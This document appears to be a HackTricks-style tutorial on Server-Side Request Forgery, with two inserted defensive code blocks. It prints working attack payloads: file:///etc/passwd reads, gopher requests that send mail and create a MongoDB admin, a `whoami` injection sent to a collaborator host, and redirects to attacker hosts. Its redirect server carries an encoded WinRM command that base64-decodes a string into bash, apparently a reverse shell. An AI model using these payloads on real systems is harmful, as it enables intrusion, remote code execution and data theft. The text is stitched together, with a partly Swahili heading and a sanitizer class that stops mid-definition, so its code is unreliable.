SSRF (Server Side Request Forgery)

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

A Server-Side Request Forgery (SSRF) vulnerability occurs when an attacker gains control over a server-side application so that it makes HTTP requests to a domain of the attacker's choosing. This vulnerability exposes the server to arbitrary external requests directed by the attacker.

Capture SSRF

The first thing you need to do is capture an SSRF interaction generated by you. To capture an HTTP or DNS interaction you can use tools such as:

Whitelisted Domains Bypass

Usually you will find that the SSRF only works on certain whitelisted domains or URLs. On the following page you have a compilation of techniques to try to bypass that whitelist:

URL Format Bypass

Bypass via open redirect

If the server is not correctly protected you can bypass all the restrictions by exploiting an Open Redirect inside the web page. Because the web page will allow SSRF to the same domain and will probably follow redirects, you can exploit the Open Redirect to make the server access any internal resource.
Read more here: https://portswigger.net/web-security/ssrf

Protocols

  • file://
  • The file:// URL scheme is referenced, pointing directly to /etc/passwd: file:///etc/passwd
  • dict://
  • The DICT URL scheme is described as being used for accessing definitions or word lists via the DICT protocol. The example shows a constructed URL targeting a specific word, database and entry number, along with an example PHP script that could be abused to connect to a DICT server using attacker-supplied credentials: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
  • SFTP://
  • Identified as a protocol for secure file transfer over a secure shell; the example shows how a PHP script could be exploited to connect to a malicious SFTP server: url=sftp://generic.com:11111/
  • TFTP://
  • Trivial File Transfer Protocol, which works over UDP, is mentioned with an example PHP script designed to send a request to a TFTP server. A TFTP request is made to 'generic.com' on port '12346' for the file 'TESTUDPPACKET': ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
  • LDAP://
  • This section covers the Lightweight Directory Access Protocol, emphasizing its use for managing and accessing distributed directory information services over IP networks. Interact with an LDAP server on localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
  • SMTP
  • One technique is described for exploiting an SSRF vulnerability to interact with SMTP services on localhost, including steps to disclose internal domain names and further investigation steps based on that information.
From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220 http://blabla.internaldomain.com ESMTP Sendmail
3. search http://internaldomain.com on github, find subdomains
4. connect
  • Curl URL globbing - WAF bypass
  • If the SSRF is executed by curl, curl has a feature called URL globbing that can be useful to bypass WAFs. For example, in this writeup you can find this example of path traversal via the file protocol:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
  • Gopher://
  • The Gopher protocol's ability to specify the IP, port and bytes for communication with a server is discussed, along with tools such as Gopherus and remote-method-guesser for crafting payloads. Two distinct examples are shown:

Gopher://

Using this protocol you can specify the IP, port and bytes you want the server to send. Then, you can basically exploit an SSRF to communicate with any TCP server (but you need to know how to talk to the service first).
Fortunately, you can use Gopherus to create payloads for several services. Additionally, remote-method-guesser can be used to create gopher payloads for Java RMI services.

Gopher SMTP

```
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
```

will make a request like

```
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: AH AH AH

You didn't say the magic word !


.
QUIT
```

Gopher HTTP

```
# For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
```

Gopher SMTP – Back connect to 1337

```php
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
```

Now query it:

```
https://example.com/?q=http://evil.com/redirect.php
```

Gopher MongoDB – Create a user with username=admin, password=admin123 and permission=administrator

```bash
# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'
```

SSRF via Referrer header & Others

Analytics software on servers often logs the Referer header to track incoming links, a practice that inadvertently exposes applications to Server-Side Request Forgery (SSRF) vulnerabilities. This is because such software may visit the external URLs mentioned in the Referer header in order to analyse the content of the referring site. To discover such vulnerabilities, the Burp Suite plugin "Collaborator Everywhere" is recommended; it leverages the way analytics tools handle the Referer header to identify potential SSRF attack surfaces.

SSRF via SNI data from certificate

A misconfiguration that can enable connections to any backend through a simple setup is illustrated by this Nginx configuration example:

```nginx
stream {
    server {
        listen 443;
        resolver 127.0.0.11;
        proxy_pass $ssl_preread_server_name:443;
        ssl_preread on;
    }
}
```

In this setup, the value from the Server Name Indication (SNI) field is used directly as the backend address. This setup exposes a Server-Side Request Forgery (SSRF) vulnerability, which can be exploited by simply specifying the desired IP address or domain name in the SNI field. An example of exploitation to force a connection to an arbitrary backend, such as internal.host.com, using the openssl command is shown below:

```bash
openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf
```

SSRF via TLS AIA CA Issuers (Java mTLS)

Some TLS stacks will automatically download missing intermediate CAs using the Authority Information Access (AIA) → CA Issuers URI inside the peer certificate. In Java, enabling -Dcom.sun.security.enableAIAcaIssuers=true while running an mTLS service makes the server fetch attacker-controlled URIs from the client certificate during the handshake, before any HTTP logic runs.

  • Requirements: mTLS enabled, Java AIA fetching enabled, attacker can present a client cert with a crafted AIA CA Issuers URI.
  • Triggering SSRF (Java 21 example):

```bash
java -Djava.security.debug=certpath \
  -Dcom.sun.security.enableAIAcaIssuers=true \
  -Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k                      # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem
```

Java's certpath debug output shows CertStore URI:http://localhost:8080, and nc captures an HTTP request whose User-Agent is controllable via -Dhttp.agent, confirming SSRF during certificate validation.

  • DoS via file://: setting the AIA CA Issuers to file:///dev/urandom on Unix-like machines makes Java treat it as a CertStore and read unbounded random bytes, pegging one CPU core and blocking subsequent connections even after the client disconnects.

SSRF via CSS Pre-Processors

LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful @import directive. During compilation the LESS engine will fetch the resources referenced in @import statements and inline their contents into the resulting CSS when the (inline) option is used.

Check how to exploit it in:

LESS Code Injection

Wget file upload

SSRF and Command Injection

It might be worth trying a payload like: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

PDF Rendering

If the web page automatically creates a PDF that includes some information you provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF, and you will be able to abuse an SSRF. Find more information here.

From SSRF to DoS

Create several sessions and try to download heavy files through the SSRF from those sessions.

SSRF PHP Functions

Check the following page for vulnerable PHP and even WordPress functions:

PHP SSRF

SSRF Redirect to Gopher

For some exploitations you might need to send a redirect response (probably to use a different protocol like gopher). Here you have different Python codes to respond with a redirect:

```python
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl


class MainHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        print("GET")
        self.send_response(301)
        # Percent-encoded gopher payload: an HTTP POST to /wsman (WinRM) on 127.0.0.1:5985
        self.send_header(
            "Location",
            "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%"
            "20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c"
            "%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a",
        )
        self.end_headers()


httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
# ssl.wrap_socket() was removed in Python 3.12; an SSLContext does the same job
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain("server.pem")
httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True)
httpd.serve_forever()
```

```python
from flask import Flask, redirect
from urllib.parse import quote

app = Flask(__name__)


@app.route('/')
def root():
    return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)


if __name__ == "__main__":
    # 'adhoc' generates a self-signed certificate at start-up and needs the cryptography package
    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
```

Misconfigured proxies to SSRF

Techniques from this post.

Flask

Vulnerable Flask proxy code:

```python
from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com'


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
    # Vulnerable on purpose: the user-controlled path is appended to SITE_NAME unvalidated
    return get(f'{SITE_NAME}{path}').content


if __name__ == "__main__":
    app.run(threaded=False)
```

Flask allows using **`@`** as the initial character, which makes the **initial hostname become the username** and injects a new one. Attack request:

```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close
```

Spring Boot

Vulnerable code:

It was discovered that it is possible to start the request path with the character ;, which then allows using @ and injecting a new host to reach. Attack request:

```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```

PHP built-in web server

Vulnerable PHP code:

```php
<?php
// Assumed definitions: the page only shows the lines that follow them
$site = "https://google.com";
$current_uri = $_SERVER['REQUEST_URI'];

$proxy_site = $site.$current_uri;
var_dump($proxy_site);

echo "\n\n";

$response = file_get_contents($proxy_site);
var_dump($response);
?>
```

PHP allows using the **char `*` before a slash in the path** of the URL; however, it has other limitations, such as that it can only be used for the root pathname `/` and dots `.` are not allowed before the first slash, so a dotless-hex encoded IP address must be used, for example:

```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close
```

Reverse proxies ambazo zinakubali absolute URLs katika request line (open forward-proxy)

Some reverse proxies also accept absolute-form request lines (GET http://10.0.0.5:8080/path HTTP/1.1) and forward the URL as-is to the backend instead of rejecting it or replacing it with the configured upstream. This turns the reverse proxy into a pre-auth forward proxy with full-read SSRF, including access to localhost-bound services that would normally be unreachable from the Internet.

Key points:

  • Request line controls destination: the authority in the absolute URL overrides the normal routing; the Host header is usually ignored.
  • Full response returned: responses from internal hosts are returned, so you can enumerate and interact (e.g., SOAP/Axis2, Keycloak, admin consoles) instead of blind probing.
  • Works on localhost: GET http://127.0.0.1:port/ HTTP/1.1\r\nHost: public-host\r\n\r\n is enough to reach loopback-only listeners.
  • Abuse as pivot: combine with other vulns (e.g., upload endpoints) to reach intra-host services.

Minimal probe:

```http
GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close
```

If you see the upstream response instead of a 400, the appliance is acting as an open proxy.

DNS Rebinding CORS/SOP bypass

If you are having problems exfiltrating content from a local IP because of CORS/SOP, DNS Rebinding can be used to bypass that limitation:

CORS - Misconfigurations & Bypass

Automated DNS Rebinding

Singularity of Origin is a tool to perform DNS rebinding attacks. It includes the components needed to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.

Also check the publicly running server at http://rebind.it/singularity.html

DNS Rebinding + TLS Session ID/Session ticket

Requirements:

  • SSRF
  • Outbound TLS sessions
  • Stuff on local ports

Attack:

  1. Ask the user/bot to access a domain controlled by the attacker
  2. The TTL of the DNS is 0 sec (so the victim will check the IP of the domain again soon)
  3. A TLS connection is created between the victim and the attacker's domain. The attacker introduces the payload inside the Session ID or Session Ticket.
  4. The domain will start an infinite loop of redirects against itself. The goal is to make the user/bot access the domain until it performs a DNS request for the domain again.
  5. In the DNS request a private IP is now returned (127.0.0.1 for example)
  6. The user/bot will try to re-establish the TLS connection and in order to do so it will send the Session ID/Ticket ID (where the attacker's payload was stored). So congratulations, you managed to make the user/bot attack itself.

Note that during this attack, if you want to attack localhost:11211 (memcache) you need to make the victim establish the initial connection with www.attacker.com:11211 (the port must always be the same).
To perform this attack you can use the tool: https://github.com/jmdx/TLS-poison/
For more information take a look at the talk where this attack is explained: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

The difference between a blind SSRF and a non-blind one is that in the blind case you cannot see the response to the SSRF request. It is therefore harder to exploit, because you will only be able to exploit well-known vulnerabilities.

Time based SSRF

Measuring the response times from the server can make it possible to tell whether a resource exists or not (it may take longer to access an existing resource than a non-existing one).

From blind to full abusing status codes

According to the blog post, some blind SSRFs may occur because even if the target URL returns a 200 status code (like AWS metadata), the data is not properly formatted and therefore the app may refuse to show it.

However, it was discovered that sending redirect responses with status codes from 305 to 309 through the SSRF could make the application follow these redirects while entering an error mode that no longer checks the data format and may just display it.

The python server used to exploit this is the following:

```python
from flask import Flask, redirect, request  # imports and app setup added so the snippet runs stand-alone

app = Flask(__name__)
METADATA_URL = "http://169.254.169.254/"   # final target of the chain


@app.route("/redir")
def redir():
    count = int(request.args.get("count", 0)) + 1
    # Pump out 305, 306, 307, 308, 309, 310 ...
    weird_status = 301 + count
    if count >= 10:                      # after 5 "weird" codes
        return redirect(METADATA_URL, 302)
    return redirect(f"/redir?count={count}", weird_status)


@app.route("/start")
def start():
    return redirect("/redir", 302)
```

Steps:

  • First 302 gets the app to start following.
  • Then it receives 305 → 306 → 307 → 308 → 309 → 310.
  • After the 5th strange code the PoC finally returns 302 → 169.254.169.254 → 200 OK.

What happens inside the target:

  • libcurl itself does follow 305–310; it just normalises unknown codes to “follow.”
  • After N weird redirects (≥ 5 here) the application’s own wrapper decides “something is off” and switches to an error mode meant for debugging.
  • In that mode it dumps the entire redirect chain plus final body back to the outside caller.
  • Result: attacker sees every header + the metadata JSON, mission accomplished.

Note that this is interesting to leak status codes that you couldn’t leak before (like a 200). However, if somehow you could also select the status code of the response (imagine that you can decide that the AWS metadata responds with a 500 status code), there might be some status codes that directly leak the content of the response.
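A defensive counterpart to the tricks above (the non-HTTP schemes under Protocols, the open-redirect bypass, the `@`, `;@` and `*@0xa9fea9fe` proxy tricks, DNS names that flip to 127.0.0.1, and the 305 to 310 redirect chain just described), as an added example that is not HackTricks code: an egress guard that validates a URL and every redirect hop before the application fetches it. The resolver and the fetch function are injectable; `FAKE_DNS`, `DEMO_CHAIN`, the `*.example` names and the address 93.184.216.34 are constructed so the demo runs offline.

```python
"""SSRF egress guard (added example; not HackTricks code or any library's API).
Blocks, before any connection is made, the tricks collected on this page:
non-HTTP schemes (gopher/dict/file/sftp...), userinfo tricks ("@evil.com",
";@evil.com", "*@0xa9fea9fe"), dotless-hex/decimal IPs, loopback, link-local
(169.254.169.254) and RFC1918 targets, and redirect hops with odd 3xx codes."""
import ipaddress
import re
import socket
from urllib.parse import urljoin, urlsplit

ALLOWED_SCHEMES = {"http", "https"}
STANDARD_REDIRECTS = {301, 302, 303, 307, 308}

def _as_ip(host):
    """Literal IPs, including '0xa9fea9fe' / '2852039166' forms; else None."""
    try:
        if re.fullmatch(r"0x[0-9a-f]+|[0-9]+", host, re.IGNORECASE):
            return ipaddress.IPv4Address(int(host, 0))
        return ipaddress.ip_address(host)
    except ValueError:
        return None

def _is_internal(ip):
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def resolve_all(host):
    """Live resolver: every address the name maps to (A and AAAA)."""
    return [ipaddress.ip_address(i[4][0]) for i in socket.getaddrinfo(host, None)]

def check_url(url, resolve=resolve_all):
    """Return (True, "ok") if the URL may be fetched, else (False, reason)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if "@" in parts.netloc:  # '@' turns the intended host into a username
        return False, "userinfo in URL authority"
    host = parts.hostname
    if not host:
        return False, "no host"
    ip = _as_ip(host)
    addrs = [ip] if ip is not None else resolve(host)
    if not addrs:
        return False, f"unresolvable host: {host}"
    # Every record is checked, so a rebinding name that mixes a public and a
    # loopback answer is rejected; connect to the checked address (pin it).
    for addr in addrs:
        if _is_internal(addr):
            return False, f"{host} resolves to internal address {addr}"
    return True, "ok"

def follow_redirects(url, fetch, resolve=resolve_all, max_hops=5):
    """Walk a redirect chain re-checking each hop. fetch(url) is injected and
    returns (status, Location or None). Gives (True, final_url) or (False, why)."""
    current = url
    for _ in range(max_hops + 1):
        ok, reason = check_url(current, resolve)
        if not ok:
            return False, reason
        status, location = fetch(current)
        if not 300 <= status < 400:
            return True, current
        if status not in STANDARD_REDIRECTS or not location:  # libcurl would follow
            return False, f"refusing non-standard redirect {status}"
        current = urljoin(current, location)
    return False, "too many redirects"

# Constructed DNS answers and responses so the demo and checks run offline.
FAKE_DNS = {"public.example": [ipaddress.ip_address("93.184.216.34")],
            "internal.example": [ipaddress.ip_address("10.0.0.5")],
            "rebind.example": [ipaddress.ip_address("93.184.216.34"),
                               ipaddress.ip_address("127.0.0.1")]}
DEMO_CHAIN = {"https://public.example/start": (302, "/hop?n=1"),
              "https://public.example/hop?n=1": (305, "/hop?n=2"),
              "https://public.example/to-gopher": (301, "gopher://127.0.0.1:5985/_POST"),
              "https://public.example/ok": (302, "/final")}
fake_resolve = FAKE_DNS.get  # unknown name -> None -> "unresolvable host"

def demo_fetch(url):
    return DEMO_CHAIN.get(url, (200, None))
```

Hostnames are resolved once and every returned record is checked; the connecting code must then use the checked address rather than resolving the name a second time, or a 0-second TTL undoes the check.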

HTML-to-PDF renderers as blind SSRF gadgets

Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.

```html
<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
</body>
</html>
```

  • TCPDF 6.10.0 performs several download attempts per <img> resource, so a single payload can generate multiple requests (useful for timing-based port scans).
  • html2pdf inherits TCPDF's <img> behaviour and adds CSS fetching inside Css::extractStyle(), which simply calls file_get_contents($href) after minimal scheme checking. Abuse it to hit loopback services, RFC1918 ranges, or cloud metadata endpoints.
  • Combine this SSRF primitive with HTML-to-PDF path traversal tricks to leak both internal HTTP responses and local files rendered into the PD.

Hardening teams should strip external URLs before rendering or sandbox the renderer's network access; until then, treat PDF generators as blind SSRF proxies.
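The stripping step the previous paragraph asks for, as an added example that is not TCPDF or html2pdf code: a sanitizer that removes every server-fetchable URL from untrusted HTML before it reaches the PDF renderer. `SAMPLE_HTML` is constructed from the probe shown above.

```python
"""Strip remote-fetch gadgets from HTML before a TCPDF/html2pdf-style renderer
sees it (added example; not TCPDF or html2pdf code). <link> elements are dropped,
<img src> survives only as an inline data: image (SVG excluded: it can reference
external resources itself), and CSS url() references are removed from style
attributes and <style> blocks. Stripped values are returned for logging."""
import html
import re
from html.parser import HTMLParser

DATA_IMAGE = re.compile(r"^data:image/(?!svg)[a-z0-9.+-]+;base64,", re.IGNORECASE)
CSS_URL = re.compile(r"url\s*\([^)]*\)", re.IGNORECASE)

class PdfHtmlSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out, self.removed, self._in_style = [], [], False

    def _clean(self, tag, attrs):
        """Cleaned attribute list, or None when the whole element must go."""
        if tag == "link":
            self.removed.append((tag, dict(attrs).get("href")))
            return None
        cleaned = []
        for name, value in attrs:
            if tag == "img" and name == "src" and not DATA_IMAGE.match(value or ""):
                self.removed.append((tag, value))
                continue
            if name == "style" and value and CSS_URL.search(value):
                self.removed.append(("style", value))
                value = CSS_URL.sub("", value)
            cleaned.append((name, value))
        return cleaned

    @staticmethod
    def _render(tag, attrs, self_closing):
        parts = [tag] + [n if v is None else f'{n}="{html.escape(v, quote=True)}"'
                         for n, v in attrs]
        return "<" + " ".join(parts) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        cleaned = self._clean(tag, attrs)
        if cleaned is not None:
            self._in_style = tag == "style"  # <style> text arrives via handle_data
            self.out.append(self._render(tag, cleaned, False))

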